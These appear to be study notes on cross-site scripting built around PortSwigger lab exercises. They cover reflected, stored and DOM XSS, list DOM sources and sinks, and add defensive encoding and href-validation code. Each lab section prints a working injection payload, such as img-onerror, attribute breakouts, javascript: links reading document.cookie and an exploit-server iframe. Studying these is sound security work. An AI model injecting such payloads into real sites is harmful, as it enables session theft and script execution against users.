# XSS vulnerability

A vulnerability in which an attacker can inject malicious JavaScript into a page; if the browser executes that script in the context of the site, the result is an XSS vulnerability.\
XSS is classified into:

* Reflected
  * the payload is not stored in the DB; it is sent in the request and echoed straight back in the response.
* Stored
  * the payload is stored in the DB through inputs such as comments, reviews and feedback forms.
* DOM-based
  * everything happens locally, inside the DOM (Document Object Model), without the server having to echo the payload.

***

## PortSwigger Labs Practice

***

## Reflected XSS into HTML context with nothing encoded

**JS Payload**

```
<script>alert(1)</script>
```

***

## Stored XSS into HTML context with nothing encoded

**JS Payload**

```
<img src=x onerror=alert(1)>
```

***

## DOM XSS in document.write sink using source location.search

A **source** is any location in the DOM where untrusted input can be read from. These are typically locations influenced by the user, such as:

* `document.URL`
* `document.documentURI`
* `document.location`
* `location.href`
* `document.referrer`
* `window.name`
* `location.hash`
* `location.search`
* `localStorage`
* `sessionStorage`
* `cookies`\
  Source: It’s like a **door** where user input enters the website.

A **sink** is a DOM function or property where if untrusted input ends up there, it can lead to XSS. Common dangerous sinks include:

* `innerHTML`
* `outerHTML`
* `document.write()`
* `eval()`
* `setTimeout()` / `setInterval()`
* `location` (e.g., assigning to `location.href`)
* `Element.setAttribute()` (if used incorrectly)
* `src`
* `href`
* `onclick`

Sink: It’s like the **point of use** where that input gets rendered or executed, so if it arrives there unchecked the page runs it.

**JS payload**

```
"><img src=x onerror=alert(1)>
```
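The source-to-sink flow described above, shown from the defender's side as an added example (this is not code from the original page or from PortSwigger): the `document.write` sink fed from `location.search` is reduced to pure functions so the markup it would write can be inspected in Node without a browser. The tracking-image template is an assumption modelled on the lab; the page itself only shows the payload. The same HTML-encoding fix also covers the `innerHTML` and attribute-context labs further down.

```javascript
// Added example, not the lab's own code. The tracker.gif template below is an
// assumption about what the vulnerable page writes; the payload is the page's.

// Vulnerable pattern: the untrusted query string is concatenated into markup.
function vulnerableTracking(search) {
  const query = new URLSearchParams(search).get('search') || '';
  return `<img src="/resources/images/tracker.gif?searchTerms=${query}">`;
}

// HTML-encode the five characters that can break out of a tag or attribute.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened pattern: encode before the value lands in an attribute. In a real
// page the better fix is to drop document.write/innerHTML entirely and set
// img.src through the DOM API, which never parses the value as HTML.
function hardenedTracking(search) {
  const query = new URLSearchParams(search).get('search') || '';
  return `<img src="/resources/images/tracker.gif?searchTerms=${htmlEncode(query)}">`;
}

// Minimal quote-aware tag scanner, enough to see what a browser would make of
// the markup: how many elements it contains and whether any carries an on*
// event-handler attribute. Not a full HTML parser.
function parseTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    const name = html[i] === '<' ? /^[a-zA-Z][\w-]*/.exec(html.slice(i + 1)) : null;
    if (!name) { i++; continue; }
    let j = i + 1 + name[0].length;
    const attrs = [];
    while (j < html.length && html[j] !== '>') {
      if (/[\s\/]/.test(html[j])) { j++; continue; }
      let k = j;
      while (k < html.length && !/[\s=>\/]/.test(html[k])) k++;
      const attrName = html.slice(j, k).toLowerCase();
      j = k;
      while (j < html.length && /\s/.test(html[j])) j++;
      let value = '';
      if (html[j] === '=') {
        j++;
        while (j < html.length && /\s/.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {
          // A quoted value swallows '>' until the matching quote, exactly
          // why encoding the quote character matters in attribute context.
          let end = html.indexOf(q, j + 1);
          if (end === -1) end = html.length;
          value = html.slice(j + 1, end);
          j = end + 1;
        } else {
          let end = j;
          while (end < html.length && !/[\s>]/.test(html[end])) end++;
          value = html.slice(j, end);
          j = end;
        }
      }
      if (attrName) attrs.push({ name: attrName, value });
    }
    tags.push({ name: name[0].toLowerCase(), attrs });
    i = j + 1;
  }
  return tags;
}

function elementCount(html) { return parseTags(html).length; }
function hasEventHandler(html) {
  return parseTags(html).some(t => t.attrs.some(a => a.name.startsWith('on')));
}

// Constructed input: the lab's payload carried in the search parameter.
const PAYLOAD_SEARCH = '?search=' + encodeURIComponent('"><img src=x onerror=alert(1)>');

for (const fn of [vulnerableTracking, hardenedTracking]) {
  const html = fn(PAYLOAD_SEARCH);
  console.log(fn.name + ':', elementCount(html), 'element(s), event handler:', hasEventHandler(html));
}
```

Running it shows the vulnerable template producing two elements, the second carrying `onerror`, while the hardened template yields a single `<img>` whose `src` merely contains inert text. The scanner is deliberately tiny; for real output validation rely on the browser's own parser (or a maintained sanitizer), not on regex-style checks.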

***

## DOM XSS in innerHTML sink using source location.search

**JS payload**

```
<img src=x onerror=alert(1)>
```

Note: a `<script>alert(1)</script>` payload will not work here, because `innerHTML` does not execute `<script>` elements it inserts; that is why an event-handler payload such as the `<img onerror>` above is used instead.

***

## DOM XSS in jQuery anchor href attribute sink using location.search source

**JS payload**

```
returnPath=javascript:alert(document.cookie)
```

The payload must be written in the form `javascript:jscode`, because it is inserted into the `href` attribute like this:

```
<a id="backLink" href="javascript:alert(document.cookie)">Back</a>
```

***

## DOM XSS in jQuery selector sink using a hashchange event

**JS payload**

In the URL:

```
web-security-academy.net/#<img src=xxx onerror=print()>
```

On the exploit server:

```
<iframe src="https://0a830062033f44e780e508b400320097.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```

***

## Reflected XSS into attribute with angle brackets HTML-encoded

**JS payload**

```
"onmouseover="alert(1)
```

***

## Stored XSS into anchor href attribute with double quotes HTML-encoded

**JS payload**

Payload entered in the website's comment form:

```
javascript:alert(1)
```

The payload will be inserted into the `href` like this:

```
<a id="author" href="javascript:alert(1)">mohab</a>
```
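Both `href` labs above (the jQuery `returnPath` sink and the stored comment author link) share the same root cause: a user-controlled value becomes a link target without its URL scheme being checked. As an added example, not code from the original page or the labs, the validator below resolves the value with the WHATWG URL parser and allows only http(s) targets. The `returnPath` name is the lab's; the allowlist, the `/` fallback and the base URL are assumptions for this example.

```javascript
// Added example: scheme allowlisting for user-supplied href values.
// ALLOWED_PROTOCOLS and the '/' fallback are choices made for this example.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// True only if the value resolves, against the page's own URL, to an http(s)
// link. The WHATWG URL parser lower-cases the scheme and strips tabs,
// newlines and surrounding whitespace, so obfuscated "javascript:" variants
// normalise to the same rejected protocol instead of slipping past a
// string comparison.
function isSafeHref(value, base) {
  if (typeof value !== 'string') return false;
  let url;
  try {
    url = new URL(value, base);
  } catch (e) {
    return false;            // unparsable input is never a safe link
  }
  return ALLOWED_PROTOCOLS.has(url.protocol);
}

// Stricter variant for a "back" link such as returnPath: only targets that
// stay on the current origin are accepted; anything else falls back to "/".
// Returning path + query (not the raw input) also discards any fragment.
function safeReturnPath(value, base) {
  if (!isSafeHref(value, base)) return '/';
  const url = new URL(value, base);
  if (url.origin !== new URL(base).origin) return '/';
  return url.pathname + url.search;
}

// Constructed inputs, including the page's own javascript: payload.
const BASE = 'https://example.com/post?postId=1';
for (const candidate of [
  'javascript:alert(document.cookie)',
  '  JaVaScRiPt:alert(1)',
  'java\tscript:alert(1)',
  '/post?postId=2',
  '//evil.example/x',
]) {
  console.log(JSON.stringify(candidate), '->', safeReturnPath(candidate, BASE));
}
```

The check belongs on the server for stored values (the comment author link) and in the client-side code for DOM sinks (the jQuery `attr('href', ...)` call), since the browser will happily navigate to whatever scheme ends up in the attribute. Output encoding alone does not help here: `javascript:alert(1)` contains no characters that HTML-encoding would touch, which is exactly why the stored lab works with double quotes encoded.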

***
